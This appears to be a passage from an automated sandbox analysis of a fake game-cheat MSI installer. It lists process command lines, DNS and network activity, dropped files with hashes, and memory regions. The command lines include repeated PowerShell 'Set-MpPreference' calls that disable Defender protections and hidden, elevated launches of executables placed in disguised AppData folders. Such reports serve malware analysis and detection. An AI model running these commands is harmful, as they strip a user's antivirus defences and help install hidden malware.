powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\SysWOW64\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4652" "2336" "2276" "2332" "0" "0" "2340" "0" "0" "0" "0" "0"

C:\Windows\Installer\MSI29A3.tmp

"C:\Windows\Installer\MSI29A3.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI29A4.tmp

"C:\Windows\Installer\MSI29A4.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI29A5.tmp

"C:\Windows\Installer\MSI29A5.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

Network

Country Destination Domain Proto
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe

MD5 429ff5999ca2785bdef9c851d00f2f5a
SHA1 0eb92e00a7c7dcfba35323c8fe3eb97e09e6cae8
SHA256 031cc4e739cacb941c49d72a18392b14a8d70751e9f6ce946606e93234599220
SHA512 3f669e9a2291c49340d40582aa4897d249d0c90ff1150b630a0e2105627b4f192099c21a54ad5ed9c95fa20ebf16ef0daae8c424a6c12d132d4eabeaed0ddb8a

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe

MD5 fd815f7b651be246d1cda9ae28b789ac
SHA1 3e661c49e10c27dde82eb4a40e229660b84239a2
SHA256 8e74ccb211d490e24ba081b31d551cf8eee6900f8f14b915eccb869c8db4cc25
SHA512 1868af8eb112dd23ee968cdd4af6d07b28eef6031388e426ba429cb4174c3133ad62d4b2471ff1a3b7aebd077ed47381af88932b19f7c86266af236377794927

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 4ac1439d52928c8ebebe4900fc32d81d
SHA1 6bb1c847f68ca530ff60a907d400010e6abe4fd7
SHA256 23998444303fd4cedb27c0b4ed2127138fde95894f3bcb57c1134a821bee3643
SHA512 af71702ead901dcd16beb9c42a19c996073ffd210eb3774bdffe3527652ec6f634261d302cc7db99952d89fcdd36c06f9946ff50b9c9fdc78816891eab7bffcd

\Users\Admin\AppData\Local\Temp\MSI976E.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI98C8.tmp

MD5 bef08040d6604f0636a9c2d819f89874
SHA1 ac0ac8f8aca719dbcc36d244cd1de9795bf5f271
SHA256 1c35cfc55cdd029bba1bc9090021b9733087b2fd4103ccd56367ceba0820281c
SHA512 2210d4b7e45e2cb4e423bbbdc452febe57e80bef21737d85668237d10211604a6d2c3ecc23562964434fb558267a9b20f388662f628e734ede40587876b8776e

\Users\Admin\AppData\Local\Temp\MSI98C8.tmp

MD5 7f30599579f7b6369cb6fbff707ad67b
SHA1 a3bfeebf1ebbfe798117d83a1b74aa6a0c63559e
SHA256 e964ac9244227c34eef09bbe1c9df10f72c597560bc48215b2c7a33d215b9006
SHA512 a285a1ca3b5ee1ec0afec9bc5c9f58be9e5df779c02df00db10936743be7311fa4d9527e39f7b078615497346e509692e7296fe6712ec399d3d21f8b5bbf6cbc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 ef0006dc4605d438acd94643e03d2c21
SHA1 bf4f657595282564a8e4d7fecce073e6049ec066
SHA256 811957316f3d1badb7ac5342b95431e01b90ffb166d54d1088616d58fcf53173
SHA512 e0b9988210cb2904b2b5942d71d8564827667b8f1635e945ec61412d843293816fb72c160a15d25c5f4d7c940ddddd0cbabe674ec13bc3bc8a21d269764293c3

\Windows\Installer\MSI9A9A.tmp

MD5 2b8656b394b10d0c9bb4edecd36fd159
SHA1 4a17ef75c074f1790cab23631afcebed8298dc4d
SHA256 1f4fbdcd0ff124f76f6404cb1f752bd89be792f218b5e18955a923c4a7047e26
SHA512 780e9545147ed00f80b75a8e1c37545cc0658671796f57698c8519b1ce3908a79645377d397a8635243ddd4120d4b9551ae3a08150ef0f40d8805a29b9c47afe

C:\Windows\Installer\MSI9A9A.tmp

MD5 64e50d7261c2f33af49f1398a8bd8df4
SHA1 9b508ed46fb46081fef7812d90863cc4cd98d5b4
SHA256 52bb810ac4ba018388e7a6e2c65d88f0e123b58092f70e2f2bbf8cb9688a0072
SHA512 fce295676f2946ef75a6034e64fada7773035c3f0df015e65cada80e9e55514c1468fe2d7e378f52faa53ee7db3467ae98f797ec6705a07e21b8da5b14e16a63

C:\Windows\Installer\MSI9B37.tmp

MD5 98e8b557ab8277024ec67044159dd0db
SHA1 e9461a865be8c889a0b1eee91691832917a58b4c
SHA256 528dda145b211e268b23cbbcd87fe353198b84f669f92b456095d6d72c2d792f
SHA512 5d5420271139d591fe042c0efe101fb70c877cc70fdf67f5ecc4d1752fd6502cb247813595986381921ec7b68ac5b3fd4b7a6e2bd9309a59aa798560d86db875

\Windows\Installer\MSI9B37.tmp

MD5 6563f4c40d42d19180368bfb0dbd2282
SHA1 47e40581e9047fbae184ef7c25366d9bb582e640
SHA256 27f1c439ba54d2544c320e85c06895141ce55e1b550a4a4e06225e686b82ffde
SHA512 966d6df8504646eadafaf75fc4b5e98ac6fed5adef4ef1a49df7cdb5f06100ae6a56c2ab2fb39b25b5afc5a88d5a047f6d97a31500877346a32af3ad47bf178f

C:\Windows\Installer\MSI9BB5.tmp

MD5 1d0a0bd519021824e51caf846a3807dc
SHA1 ae63f1c019e254aefebd7eec37b2903f53753c3d
SHA256 5165f4956be6c67e1b07e3728214888bcafb568badae27044f93cd2889356517
SHA512 f6f5c1e99d8e8c14bf6409fe9a4195fb22c13237c3152cb007b774ed28633c2b65a48cc79a900567aea6992e696a483dfb068d9e655353fb79fff05dd638cbb1

\Windows\Installer\MSI9BB5.tmp

MD5 787b5fb8d8cee58254d4e8682f45eca2
SHA1 5e12336e4f944aa293f0145b682993b899f6bc62
SHA256 5d345df41754e564a24eef019459a23c5e461ef34eba8f058ee58c7f6c809fc0
SHA512 e9ed96c412489fdce65b58a67a265095708f8a6b79792268cca624c8bfba526cf39fc7696d150dc7ed0320c1b26afa161a17155a4b77f223f70cc7b9d7239503

\Windows\Installer\MSI9C33.tmp

MD5 a0aaffb27c12631d2dc53240d8516205
SHA1 fdc23366b20616723953ca0bd7e15b1a2f41f9eb
SHA256 331835f61784087590dedc78082dd6a76b30c1610a811e658c83f2c3e1b9cefd
SHA512 641b18cd64101d6e4af4fa4da2f35764376bcd578df548e38ff88e351ed434f974e04de6ab8790899b48fe1eb0f940d446376dd32b58dbdd8b095d35f2899b4c

C:\Windows\Installer\MSI9C33.tmp

MD5 d107effbdea05bb6e1298d776988011f
SHA1 0f171aac1a01a9c5a3e8ee10bc32854d1e0b630a
SHA256 581234b4aa042ac604972e9edf4e34be3a4c7e487901317e447cee1f544cc1cd
SHA512 bc9639110f5e46ce730c94e56c49aa7ce2e39cd7b09c8e8615f6f7efaa9fa2cccafc3f4a1d1b386d739164933cc376e4dd139b7464e773c17c2a76dd7428a781

\Windows\Installer\MSI9CC1.tmp

MD5 a200fd2773e30f865edabe295efbdaab
SHA1 364ad7dc358abaa068e06e63347f7285abadc40f
SHA256 54ac228b05f0716c436e6e103822c881997c0ee6b84ca30bbd78dc4660abc4d1
SHA512 d827405394f3bd6a08020e3049a9cc6fe1b89bd81562ff45d6f38ed660d2c1dc491c335543ccbe820c96831ec34f60e9b830a1f721f957e4ee6b7cad527edc9f

C:\Windows\Installer\MSI9CC1.tmp

MD5 22eeb735c9209b015151d0c3597cd0ec
SHA1 59e7dea0a149df82f1a9e3fe79eb20b9750cbddb
SHA256 e9f62329180c8cb0c4f09f8739c3a5f595fd250872a8b46bb005cdd8fd26d924
SHA512 81b249e7449772b6b3bef290d93d4727b14432e2e07c8ff5358eda6f137b86ada08c9792493d1f1dd538d688741b753a94e528c69f11b44b0cc5aafd732db7fa

\Windows\Installer\MSI9D3F.tmp

MD5 053c325ee1a7383a87595fbbe67f7e43
SHA1 efcf61277655759e161cd0088e6038e629ae1908
SHA256 e4df62dde8f930577789bc477794e90c993666a7f4237d77106ec8c94b73c226
SHA512 8001caa127c3ecaf176188d5fce5377daa0c0c48d4f8cb73a5003353b308a64ae7406e3bb1aa8131c2d8c33d976f8a8fa117071369cef98e07730ac1ce55714a

C:\Windows\Installer\MSI9D3F.tmp

MD5 ba2d86edbdb0584c8c5fc5058f84cb66
SHA1 5306ce09fd1e044a5b0fc68b7661ac121e75ba36
SHA256 738071d53030f1f314df2bf383d9bda693ea0e23f7569ceb97a24ba21a7d1840
SHA512 706cec76e2e7aae10b3ca187c12352d827dde38542149d15c2da6ed2c738d7468e0c76e5e16083b64fa3726501a02056c60a2704abf6833ad959c876f4f5d817

memory/4828-3595-0x00000114F99F0000-0x00000114F9A12000-memory.dmp

memory/4828-3597-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/4828-3599-0x00000114F98E0000-0x00000114F98F0000-memory.dmp

memory/4828-3601-0x00000114F9BA0000-0x00000114F9C16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss9D7B.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrdktsbx.32d.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4828-3600-0x00000114F98E0000-0x00000114F98F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr9D79.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\scr9D7A.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 ee886dc542f9673ec6c92fa14e778ba0
SHA1 83c967dd2afeda47710d1f16faaaa88602d5724d
SHA256 8b99c8f799b6a533e3981e149bf2920d771435dd35b76cf6734b4b73559cb49a
SHA512 58c965582b56de74cacf380697048eb41139baedecf984d18e3181d0bc1afde9858393c159bc42334014f94c6802b09ad6dfdd63aafc792ee8515ab23c1903a9

